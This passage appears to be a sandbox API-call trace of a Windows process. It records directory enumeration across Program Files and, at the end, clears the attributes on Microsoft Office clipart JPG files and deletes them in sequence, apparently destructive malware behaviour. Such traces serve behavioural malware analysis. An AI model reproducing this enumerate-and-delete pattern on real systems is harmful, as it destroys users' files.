ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa1d4a90, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AS OLEDB", cAlternateFileName="ASOLED~1")) returned 0 [0066.835] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1d4a90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa1d4a90, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa1d4a90, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0066.835] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1d4a90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa1d4a90, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa1d4a90, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AS OLEDB", cAlternateFileName="ASOLED~1")) returned 1 [0066.835] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0066.836] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0066.836] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0066.836] CoTaskMemFree (pv=0x506980) [0066.836] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1d4a90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa1d4a90, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa1d4a90, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0066.836] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1d4a90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x5f1ce1d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5f1ce1d0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="10", cAlternateFileName="")) returned 1 [0066.836] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1d4a90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x5f1ce1d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5f1ce1d0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="10", cAlternateFileName="")) returned 0 [0066.836] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1d4a90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa1d4a90, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa1d4a90, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0066.836] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1d4a90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x5f1ce1d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5f1ce1d0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="10", cAlternateFileName="")) returned 1 [0066.836] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0066.836] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0066.836] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0066.836] CoTaskMemFree (pv=0x506980) [0066.838] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1d4a90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x5f1ce1d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5f1ce1d0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0066.838] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5146e3d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5edefe10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5edefe10, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Cartridges", cAlternateFileName="CARTRI~1")) returned 1 [0066.838] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf3cf6c00, ftCreationTime.dwHighDateTime=0x1ca2caa, ftLastAccessTime.dwLowDateTime=0x5f005150, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf3cf6c00, ftLastWriteTime.dwHighDateTime=0x1ca2caa, nFileSizeHigh=0x0, nFileSizeLow=0x2a65d68, dwReserved0=0x0, dwReserved1=0x0, cFileName="msmdlocal.dll", cAlternateFileName="MSMDLO~1.DLL")) returned 1 [0066.838] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x47fe200, ftCreationTime.dwHighDateTime=0x1ca2cab, ftLastAccessTime.dwLowDateTime=0x51552c10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x47fe200, ftLastWriteTime.dwHighDateTime=0x1ca2cab, nFileSizeHigh=0x0, nFileSizeLow=0xbc4568, dwReserved0=0x0, dwReserved1=0x0, cFileName="msmgdsrv.dll", cAlternateFileName="")) returned 1 [0066.838] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5b10f00, ftCreationTime.dwHighDateTime=0x1ca2cab, ftLastAccessTime.dwLowDateTime=0x5f28c8b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5b10f00, ftLastWriteTime.dwHighDateTime=0x1ca2cab, nFileSizeHigh=0x0, nFileSizeLow=0x7c6f68, dwReserved0=0x0, dwReserved1=0x0, cFileName="msolap100.dll", cAlternateFileName="MSOLAP~1.DLL")) returned 1 [0066.838] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb46ad400, ftCreationTime.dwHighDateTime=0x1c8e1fb, ftLastAccessTime.dwLowDateTime=0x516f5b30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xb46ad400, ftLastWriteTime.dwHighDateTime=0x1c8e1fb, nFileSizeHigh=0x0, nFileSizeLow=0x4dc18, dwReserved0=0x0, dwReserved1=0x0, cFileName="msolui100.dll", cAlternateFileName="MSOLUI~1.DLL")) returned 1 [0066.839] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1d4a90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa1d4a90, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa1d4a90, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Resources", cAlternateFileName="RESOUR~1")) returned 1 [0066.839] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1d4a90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa1d4a90, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa1d4a90, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Resources", cAlternateFileName="RESOUR~1")) returned 0 [0066.840] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1d4a90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x5f1ce1d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5f1ce1d0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0066.840] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5146e3d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5edefe10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5edefe10, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Cartridges", cAlternateFileName="CARTRI~1")) returned 1 [0066.840] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf3cf6c00, ftCreationTime.dwHighDateTime=0x1ca2caa, ftLastAccessTime.dwLowDateTime=0x5f005150, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf3cf6c00, ftLastWriteTime.dwHighDateTime=0x1ca2caa, nFileSizeHigh=0x0, nFileSizeLow=0x2a65d68, dwReserved0=0x0, dwReserved1=0x0, cFileName="msmdlocal.dll", cAlternateFileName="MSMDLO~1.DLL")) returned 1 [0066.840] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x47fe200, ftCreationTime.dwHighDateTime=0x1ca2cab, ftLastAccessTime.dwLowDateTime=0x51552c10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x47fe200, ftLastWriteTime.dwHighDateTime=0x1ca2cab, nFileSizeHigh=0x0, nFileSizeLow=0xbc4568, dwReserved0=0x0, dwReserved1=0x0, cFileName="msmgdsrv.dll", cAlternateFileName="")) returned 1 [0066.840] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5b10f00, ftCreationTime.dwHighDateTime=0x1ca2cab, ftLastAccessTime.dwLowDateTime=0x5f28c8b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5b10f00, ftLastWriteTime.dwHighDateTime=0x1ca2cab, nFileSizeHigh=0x0, nFileSizeLow=0x7c6f68, dwReserved0=0x0, dwReserved1=0x0, cFileName="msolap100.dll", cAlternateFileName="MSOLAP~1.DLL")) returned 1 [0066.840] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb46ad400, ftCreationTime.dwHighDateTime=0x1c8e1fb, ftLastAccessTime.dwLowDateTime=0x516f5b30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xb46ad400, ftLastWriteTime.dwHighDateTime=0x1c8e1fb, nFileSizeHigh=0x0, nFileSizeLow=0x4dc18, dwReserved0=0x0, dwReserved1=0x0, cFileName="msolui100.dll", cAlternateFileName="MSOLUI~1.DLL")) returned 1 [0066.841] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1d4a90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa1d4a90, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa1d4a90, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Resources", cAlternateFileName="RESOUR~1")) returned 1 [0066.841] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0066.841] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0066.841] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0066.841] CoTaskMemFree (pv=0x506980) [0066.852] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5146e3d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5edefe10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5edefe10, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0066.852] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8ce7000, ftCreationTime.dwHighDateTime=0x1c9b00b, ftLastAccessTime.dwLowDateTime=0x51494530, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xa8ce7000, ftLastWriteTime.dwHighDateTime=0x1c9b00b, nFileSizeHigh=0x0, nFileSizeLow=0x4360, dwReserved0=0x0, dwReserved1=0x0, cFileName="as80.xsl", cAlternateFileName="")) returned 1 [0066.852] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8ce7000, ftCreationTime.dwHighDateTime=0x1c9b00b, ftLastAccessTime.dwLowDateTime=0x5ed7d9f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xa8ce7000, ftLastWriteTime.dwHighDateTime=0x1c9b00b, nFileSizeHigh=0x0, nFileSizeLow=0x4932, dwReserved0=0x0, dwReserved1=0x0, cFileName="as90.xsl", cAlternateFileName="")) returned 1 [0066.853] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa81fdc00, ftCreationTime.dwHighDateTime=0x1c8dd0e, ftLastAccessTime.dwLowDateTime=0x51494530, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xa81fdc00, ftLastWriteTime.dwHighDateTime=0x1c8dd0e, nFileSizeHigh=0x0, nFileSizeLow=0x78e4, dwReserved0=0x0, dwReserved1=0x0, cFileName="Informix.xsl", cAlternateFileName="")) returned 1 [0066.853] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8ce7000, ftCreationTime.dwHighDateTime=0x1c9b00b, ftLastAccessTime.dwLowDateTime=0x51494530, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xa8ce7000, ftLastWriteTime.dwHighDateTime=0x1c9b00b, nFileSizeHigh=0x0, nFileSizeLow=0x712e, dwReserved0=0x0, dwReserved1=0x0, cFileName="msjet.xsl", cAlternateFileName="")) returned 1 [0066.853] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8ce7000, ftCreationTime.dwHighDateTime=0x1c9b00b, ftLastAccessTime.dwLowDateTime=0x51552c10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xa8ce7000, ftLastWriteTime.dwHighDateTime=0x1c9b00b, nFileSizeHigh=0x0, nFileSizeLow=0x851c, dwReserved0=0x0, dwReserved1=0x0, cFileName="sql2000.xsl", cAlternateFileName="")) returned 1 [0066.853] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8ce7000, ftCreationTime.dwHighDateTime=0x1c9b00b, ftLastAccessTime.dwLowDateTime=0x5edefe10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xa8ce7000, ftLastWriteTime.dwHighDateTime=0x1c9b00b, nFileSizeHigh=0x0, nFileSizeLow=0x7d92, dwReserved0=0x0, dwReserved1=0x0, cFileName="sql70.xsl", cAlternateFileName="")) returned 1 [0066.853] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8ce7000, ftCreationTime.dwHighDateTime=0x1c9b00b, ftLastAccessTime.dwLowDateTime=0x51552c10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xa8ce7000, ftLastWriteTime.dwHighDateTime=0x1c9b00b, nFileSizeHigh=0x0, nFileSizeLow=0x9a5b, dwReserved0=0x0, dwReserved1=0x0, cFileName="sql90.xsl", cAlternateFileName="")) returned 1 [0066.853] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa81fdc00, ftCreationTime.dwHighDateTime=0x1c8dd0e, ftLastAccessTime.dwLowDateTime=0x5edefe10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xa81fdc00, ftLastWriteTime.dwHighDateTime=0x1c8dd0e, nFileSizeHigh=0x0, nFileSizeLow=0x745e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Sybase.xsl", cAlternateFileName="")) returned 1 [0066.853] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0066.855] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5146e3d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5edefe10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5edefe10, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0066.855] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8ce7000, ftCreationTime.dwHighDateTime=0x1c9b00b, ftLastAccessTime.dwLowDateTime=0x51494530, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xa8ce7000, ftLastWriteTime.dwHighDateTime=0x1c9b00b, nFileSizeHigh=0x0, nFileSizeLow=0x4360, dwReserved0=0x0, dwReserved1=0x0, cFileName="as80.xsl", cAlternateFileName="")) returned 1 [0066.855] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8ce7000, ftCreationTime.dwHighDateTime=0x1c9b00b, ftLastAccessTime.dwLowDateTime=0x5ed7d9f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xa8ce7000, ftLastWriteTime.dwHighDateTime=0x1c9b00b, nFileSizeHigh=0x0, nFileSizeLow=0x4932, dwReserved0=0x0, dwReserved1=0x0, cFileName="as90.xsl", cAlternateFileName="")) returned 1 [0066.855] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa81fdc00, ftCreationTime.dwHighDateTime=0x1c8dd0e, ftLastAccessTime.dwLowDateTime=0x51494530, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xa81fdc00, ftLastWriteTime.dwHighDateTime=0x1c8dd0e, nFileSizeHigh=0x0, nFileSizeLow=0x78e4, dwReserved0=0x0, dwReserved1=0x0, cFileName="Informix.xsl", cAlternateFileName="")) returned 1 [0066.856] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0066.856] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0066.856] CoTaskMemFree (pv=0x506980) [0066.856] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0066.856] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0066.856] CoTaskMemFree (pv=0x506980) [0066.857] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0066.857] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0066.857] CoTaskMemFree (pv=0x506980) [0066.858] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0066.858] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0066.858] CoTaskMemFree (pv=0x506980) [0066.859] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0066.859] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0066.859] CoTaskMemFree (pv=0x506980) [0066.936] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0066.944] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099145.JPG", dwFileAttributes=0x80) returned 1 [0066.945] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099145.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099145.jpg")) returned 1 [0066.949] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0066.957] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099147.JPG", dwFileAttributes=0x80) returned 1 [0066.957] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099147.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099147.jpg")) returned 1 [0066.960] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0066.967] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099148.JPG", dwFileAttributes=0x80) returned 1 [0066.967] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099148.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099148.jpg")) returned 1 [0066.971] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0066.978] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099150.JPG", dwFileAttributes=0x80) returned 1 [0066.978] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099150.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099150.jpg")) returned 1 